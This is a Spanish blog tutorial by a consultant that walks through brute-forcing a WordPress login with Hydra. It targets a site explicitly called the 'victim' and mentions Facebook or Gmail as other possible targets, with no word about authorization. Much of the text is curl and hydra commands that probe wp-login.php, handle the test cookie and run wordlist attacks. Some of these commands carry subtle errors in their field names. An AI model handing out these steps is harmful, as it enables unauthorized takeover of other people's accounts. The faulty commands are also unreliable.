Ciberseguridad, Wordpress

Hydra WordPress Ataque Fuerza Bruta

Posted on by Fernando Tamez

En este tutorial te explicare detalladamente como atacar con fuerza bruta un sitio en WordPress. Utilizaremos la popular y poderosa herramienta Hydra, la cual viene instalada por defecto en Kali Linux y si no tienes Kali linux, la puedes descargar para tu sistema operativo.

Hydra es un programa para hacer pentesting, el cual utiliza diferentes métodos como la fuerza bruta.

Te permite utilizar diccionarios o listas de palabras con muchísimas combinaciones de distintos usuarios o contraseñas para intentar hacer “Log In” o “Acceder” al sitio que quieres atacar.

Hydra te permitirá intentar accesar a cualquier sitio en donde exista un formulario de usuario y contraseña como por ejemplo sitios hechos en WordPress, Joomla, o por ejemplo, facebook o Gmail. Sin embargo, este tutorial esta pensado en accesar a un sitio en WordPress del cual solo tenemos el usuario y no tenemos la contraseña.

  1. Primero que todo es necesario identificar la pagina en donde te solicitan el usuario y contraseña: https://www.paginavictima.com/wp-login.php/
  2. Ahora es necesario identificar el nombre del campo de texto de usuario, del campo de texto de contraseña, asi como del botón de “Acceder” para hacer log in al WordPress y de la cookie que WordPress utiliza para identificarte como usuario conectado.
  3. Para identificar el nombre de estos elementos, lo puedes hacer mediante dando click derecho y inspeccionar el código de fuente. De igual manera lo puedes identificar mediante el comando “curl” en la terminal de linux.
  4. Este tutorial lo voy a hacer utilizando Kali Linux, así que abriré la terminal y escribiré el siguiente comando: $ curl https://www.paginavictima.com/wp-login.php/ 
  5. Antes que cualquier cosa, es necesario entender como funciona Hydra. Básicamente Hydra funciona con el siguiente comando: $ hydra -L /diccionario/usuarios.txt -P /diccionario/contrasenas.txt sitiovictima.com  -V https-form-post ‘wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’
    • -L: quiere decir que utilizara el archivo de la lista de usuarios. Si pones la “L” minúscula “l” podrás poner el usuario (en caso de saber el usuario de la víctima).
    • -P: quiere decir que utilizara el archivo de la lista de contraseñas.
    • -V: quiere decir que estará en modo “vervose” pero como es mayúscula “-V” mostrara cada 1 de los intentos y solo te pondrá en verde el correcto. En caso de no querer ver la lista de todos los intentos poner la “-V” en minúscula así  “-v”.
    • https-form-post: es 1 de los muchos diferentes servicios soportados y que hydra te permitirá atacar. 
    • ‘wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’: es como el WordPress manda la info mediante el metodo POST de la pagina wp-login.php e intenta acceder al admin wp-admin.php.
  6. Una vez que haga click en “enter” me aparecerá el código de fuente de https://www.paginavictima.com así que procederé en buscar el nombre de cada elemento o campo del formulario (usuario, contraseña, botón de login y cookie). Si no estuviéramos intentando crackear un sitio WordPress no utilizaríamos la cookie ya que simplemente poniendo el mensaje de error de login Hydra se da cuenta que esta mal y pasa a utilizar la siguiente combinación de usuario y contraseña. Sin embargo, WordPress trabaja diferente, utiliza una cookie para identificar que ya estas identificado en el sitio. Así que es necesario encontrar el nombre de la cookie también.
    • WordPress es open source así que en todos los sitios WordPress veremos que estos son los nombres de cada forma:
      • Usuario: “log”
      • Contraseña: “pwd”
      • Botón: “wp-submit”
      • Cookie: “testcookie”
  7. Ya teniendo identificado el nombre de cada forma voy a volver a hacer un “curl” pero esta vez le pasare datos mediante el método “POST” ya que WordPress pasa los datos con este método. Este comando de “curl” en donde pasa los datos se debe de hacer de la siguiente manera: $curl -v –data ‘login=USUARIOREAL&pwd=CLAVEREAL&wp-submit=Log In&testcookie=1’ https://www.paginavictima.com/wp-login.php/
  8. Al poner el comando anterior, si observamos el código, veremos que aparecerá un “ERROR que dice que las cookies están bloqueadas y mas arriba veremos que hay una opción que dice lo siguiente:
    • <Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure
  9. Asi que volveremos a poner el comando pero ahora agregaremos la cookie: $ curl -v –data ‘login=USUARIOREAL&pwd=CLAVEREAL&wp-submit=Log In&testcookie=1’ –cookie ‘wordpress_test_cookie=WP+Cookie+check’ https://www.paginavictima.com/wp-login.php/
  10. Ahora veremos que el mensaje es que si hizo “Log In” correctamente y al final del mensaje veremos que WordPress usa para identificar que hizo “Log In” correctamente el siguiente texto: < Location: https://www.paginavictima.com/wp-admin/
  11. Ahora es necesario crear un documento “.txt” en donde pongamos todas las claves que creamos que puedan ser y separarlas con el botón enter para que sea como una lista.
  12. Ahora si, ya que tenemos el archivo “contraseñas.txt” es necesario utilizar el siguiente comando de hydra para hacer el ataque de fuerza bruta: $ hydra -P /ubicacion/de/diccionario/de/contraseñas.txt -l usuario tupagina.com -V https-form-post ‘/wp-login.php:log^USER^&pass=^PASS^&wp-submit=Log In&testcookie=1:S=Location’
Fernando Tamez

Lo que busco profesionalmente para todos, es lo que dice la frase: "Cloud done the right way, the best practices way." Trabajo para que TODOS utilicemos la nube de una manera segura y eficiente, para el beneficio de la humanidad. Somos una empresa de consultoría y capacitación tecnológica, enfocada en la comunicación digital, automatización y seguridad de la información.

Leave a Reply

Your email address will not be published. Required fields are marked *